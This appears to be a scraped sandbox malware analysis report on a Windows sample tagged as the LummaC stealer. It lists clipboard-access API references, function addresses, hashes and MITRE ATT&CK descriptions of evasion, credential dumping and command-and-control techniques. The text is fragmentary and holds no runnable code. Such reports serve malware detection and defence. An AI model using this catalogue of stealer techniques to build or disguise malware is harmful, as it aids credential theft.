GetClipboardData.USER32 ref: 0098219C
GlobalLock.KERNEL32 ref: 009821B5
GlobalUnlock.KERNEL32 ref: 009822A2
CloseClipboard.USER32 ref: 009822AB

Strings

i, xrefs: 0098222B
", xrefs: 00982226
], xrefs: 009821FE
3, xrefs: 00982203
%, xrefs: 0098221C
), xrefs: 00982208
, xrefs: 00982212
,, xrefs: 00982217

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: $"$%$)$,$3$]$i
API String ID: 2832541153-1573611430
Opcode ID: 5d62201db40e72d17096051cffeee7247bf7bd506d0ec61628c4f34f18256801
Instruction ID: 1e3618732f09c184e24cdbdaccd4673f95f28b2081aff30c1ec53a51354025d0
Opcode Fuzzy Hash: 5d62201db40e72d17096051cffeee7247bf7bd506d0ec61628c4f34f18256801
Instruction Fuzzy Hash: 4E41287150C3818EE301AFB8D48875EBFE0AB96308F08496DE9D997282D679858CD757

Function 0040B940 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00408B18), ref: 0040B946
FreeLibrary.KERNEL32 ref: 0040B967

Strings

Mw, xrefs: 0040B946, 0040B967

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: FreeLibrary
String ID: Mw
API String ID: 3664257935-2910736759
Opcode ID: a827e64361feda1593fc9a23190c2b71f93d579417bad19698ec4d2236d5cf7a
Instruction ID: f793f01f4bb5e0abb4eded0ac4f20d9b75498740bef6d8618162a5f29f65b896
Opcode Fuzzy Hash: a827e64361feda1593fc9a23190c2b71f93d579417bad19698ec4d2236d5cf7a
Instruction Fuzzy Hash: F6C00239820000EFDE113F70FD0992C3A23FB46706746023DF70941531DE22092AEA19

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report vPqd8HLs88.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_vPqd8HLs88.exe_85fa23ae9a53a3ddc9b6e6dbb1d3e5533a89b8_701cd611_dbeb143d-5b01-4748-a91b-f8a0c55b228f\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC09D.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC179.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC1A9.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
vPqd8HLs88.exe

Function 00436E90 Relevance: 35.6, APIs: 11, Strings: 9, Instructions: 647
memorycomCOMMON

Function 00415871 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 390
COMMON

Function 0042C294 Relevance: 9.3, APIs: 3, Strings: 2, Instructions: 581
COMMON

Function 004089E0 Relevance: 6.1, APIs: 4, Instructions: 99
threadCOMMON

Function 00423E10 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 546
COMMON

Function 0042C856 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 375
COMMON

Function 0042CBC2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 334
COMMON

Function 0040D60B Relevance: 4.9, APIs: 1, Strings: 2, Instructions: 358
COMMON

Function 0040BCF7 Relevance: 3.8, Strings: 3, Instructions: 88
COMMON

Function 009207A6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 0043E8E0 Relevance: 2.8, Strings: 2, Instructions: 337
COMMON

Function 0095003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 00950E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre